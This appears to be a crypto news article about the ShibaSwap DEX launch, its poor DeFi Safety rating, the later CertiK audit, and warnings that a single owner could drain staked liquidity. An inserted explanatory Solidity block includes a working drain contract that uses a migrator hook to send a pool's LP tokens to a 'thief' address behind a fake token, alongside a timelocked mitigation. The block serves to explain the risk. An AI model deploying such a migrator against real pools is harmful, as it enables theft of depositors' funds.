July 11: Updated to include the results of CertiK's audit of the platform and DeFi Safety's subsequent upgrade of the rating to 35%.
Despite the immediate success of dog-themed decentralized exchange ShibaSwap, there are warnings that the DEX’s liquidity providers are throwing capital into an opaque protocol of questionable security.
Building on the popularity of their Doge-style token, Shiba Inu (SHIB), amid the Elon Musk-stoked dog-token trading frenzy, the coin’s developers launched their DEX with enticing yield incentives for liquidity providers on Tuesday.
Within 24 hours of launching, the protocol had amassed a total value locked (TVL) of more than $1 billion.
On Wednesday, platform reviewer DeFi Safety published a report on ShibaSwap, scoring the protocol at just 3%, far below the 70% level the site considers a pass.
Describing the score as “a devastating fail,” DeFi Safety failed ShibaSwap on all but two of its 22 review criteria, with the protocol scoring 30% for the clarity of information provided in its white paper.
The review’s author is Rex Hygate, the founder of SecuEth and Caliburn Consulting. He highlighted ShibaSwap’s anonymous team and its lack of transparency and documentation, and pointed out that there is no public software repository, no development history, and no way to test the code.
ShibaSwap is up with a devastating 3% score. If you are looking for a prime example of what absolute negligence looks like in a protocol, look no further than this. Zero Transparency. You are putting your money in a black hole. https://t.co/dUzU0vvCHW @ChrisBlec @ShibArmy #DeFi — DeFi Safety (@DefiSafety) July 7, 2021
The platform has since undergone an audit by CertiK, which has previously worked with Crypto.com, Ontology and Neo, among others. The audit found eight major issues; CertiK provided remediation advice to the team and marked all eight as resolved. Many of the centralization issues were resolved by moving privileged functions behind a six-of-nine multisig.
Following the release of CertiK's audit, DeFi Safety upgraded the rating to 35%, with the biggest improvements in the 'Security' category, which scored 79%, and 'Access Controls', which increased to 57%.
On Wednesday, Solidity developer Joseph Schiarizzi posted an article warning that ShibaSwap’s staking contract had been under the control of just a single address for most of its first day of operation.
While ShibaSwap has since updated the contract to a multi-signature account requiring six of nine Safe Owners to agree on transactions before they can be executed, Schiarizzi warns that each of the addresses may be under the control of a single entity:
“Multiple of these Safe Owners are new accounts with 0 transactions and no ETH, so they are most likely just place holders for the ShibaSwap devs who can agree easily to call any owner only function on the staking contract.”
Schiarizzi emphasized the risks associated with the staking contract’s migrate function being under the control of a single entity, identifying that the contract owners “can simply deploy a new migrator contract which sends themselves all the LP tokens.”
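The drain Schiarizzi describes follows from a common staking-contract shape (the MasterChef-style migrator hook), and it is easier to reason about with code in front of you. The block below is an added illustration, not ShibaSwap's code (which, as the article notes, was not public at the time) and not Schiarizzi's: all contract and function names are hypothetical. It shows why a "migrate" function is a full-drain primitive for whoever controls the owner key, why the usual balance check does not prevent it, and one mitigation (a timelocked migrator change) that gives liquidity providers time to withdraw before an arbitrary migrator goes live.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Minimal ERC-20 surface the staking contract needs (hypothetical example).
interface IERC20 {
    function balanceOf(address a) external view returns (uint256);
    function approve(address s, uint256 v) external returns (bool);
    function transferFrom(address f, address t, uint256 v) external returns (bool);
}

// MasterChef-style migrator hook: the pool hands its LP balance to an
// external contract and accepts whatever token that contract returns.
interface IMigrator {
    function migrate(IERC20 lp) external returns (IERC20);
}

// 1) The risky shape: a single owner can point `migrator` anywhere and call
//    `migrate` in the same transaction. The balance check does not help,
//    because the migrator chooses which token gets balance-checked.
contract StakingRisky {
    address public owner;
    IMigrator public migrator;
    IERC20[] public lpTokens;

    modifier onlyOwner() { require(msg.sender == owner, "not owner"); _; }

    constructor(IERC20[] memory pools) { owner = msg.sender; lpTokens = pools; }

    function setMigrator(IMigrator m) external onlyOwner { migrator = m; }

    function migrate(uint256 pid) external onlyOwner {
        IERC20 lp = lpTokens[pid];
        uint256 bal = lp.balanceOf(address(this));
        lp.approve(address(migrator), bal);
        IERC20 newLp = migrator.migrate(lp);
        // Passes as long as `newLp` says so; an attacker-supplied token says anything.
        require(newLp.balanceOf(address(this)) == bal, "migrate: bad balance");
        lpTokens[pid] = newLp;
    }
}

// Hypothetical attacker migrator: pulls the approved LP tokens to `thief`
// and returns a dummy token that reports the balance the pool expects.
contract DrainMigrator is IMigrator {
    address public immutable thief;
    constructor(address t) { thief = t; }

    function migrate(IERC20 lp) external returns (IERC20) {
        uint256 bal = lp.balanceOf(msg.sender);          // msg.sender is the pool
        lp.transferFrom(msg.sender, thief, bal);           // uses the pool's approval
        return IERC20(address(new FakeLP(msg.sender, bal)));
    }
}

contract FakeLP is IERC20 {
    address private immutable pool;
    uint256 private immutable claimed;
    constructor(address p, uint256 c) { pool = p; claimed = c; }
    function balanceOf(address a) external view returns (uint256) { return a == pool ? claimed : 0; }
    function approve(address, uint256) external pure returns (bool) { return true; }
    function transferFrom(address, address, uint256) external pure returns (bool) { return true; }
}

// 2) Hardened shape: a migrator change is announced on-chain and only takes
//    effect after DELAY, so depositors can read `pendingMigrator` and exit
//    first. Ownership should additionally sit behind a multisig whose signers
//    are demonstrably distinct parties; a timelock alone does not fix a
//    multisig whose keys are all held by one entity.
contract StakingTimelocked {
    uint256 public constant DELAY = 2 days;   // assumption: chosen for illustration
    address public owner;
    IMigrator public migrator;
    IMigrator public pendingMigrator;
    uint256 public migratorEta;               // earliest timestamp the pending value may apply
    IERC20[] public lpTokens;

    event MigratorProposed(address migrator, uint256 eta);
    event MigratorApplied(address migrator);

    modifier onlyOwner() { require(msg.sender == owner, "not owner"); _; }

    constructor(IERC20[] memory pools) { owner = msg.sender; lpTokens = pools; }

    function proposeMigrator(IMigrator m) external onlyOwner {
        pendingMigrator = m;
        migratorEta = block.timestamp + DELAY;
        emit MigratorProposed(address(m), migratorEta);
    }

    function applyMigrator() external onlyOwner {
        require(address(pendingMigrator) != address(0), "nothing pending");
        require(block.timestamp >= migratorEta, "timelock active");
        migrator = pendingMigrator;
        pendingMigrator = IMigrator(address(0));
        emit MigratorApplied(address(migrator));
    }

    function migrate(uint256 pid) external onlyOwner {
        IERC20 lp = lpTokens[pid];
        uint256 bal = lp.balanceOf(address(this));
        lp.approve(address(migrator), bal);
        IERC20 newLp = migrator.migrate(lp);
        require(newLp.balanceOf(address(this)) == bal, "migrate: bad balance");
        lpTokens[pid] = newLp;
    }
}
```

The practical check for a depositor is therefore not "is there a multisig" but "who can change `migrator`, how long before the change is live, and are the signers independent". On-chain, the things to look at are whether the owner is an EOA or a multisig, the multisig's threshold and owner list, whether those owner addresses have any history (transaction count, funding source, ENS or known attribution) or are, as Schiarizzi observed, fresh zero-balance accounts, and whether a pending migrator or timelock queue exists at all.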
DeFi Watch analyst Chris Blec shared Schiarizzi’s warnings about ShibaSwap’s security risks to his 22,000 followers and highlighted the DeFi Safety review.
⚠️ Yesterday, it was noticed that all funds in ShibaSwap could be drained by 1 Ethereum account.
ShibaSwap then switched ownership to a new Gnosis multisig with unknown signers & fresh addresses.
The problem: it's possible to create a multisig and own all the keys yourself. — Chris Blec (@ChrisBlec) July 7, 2021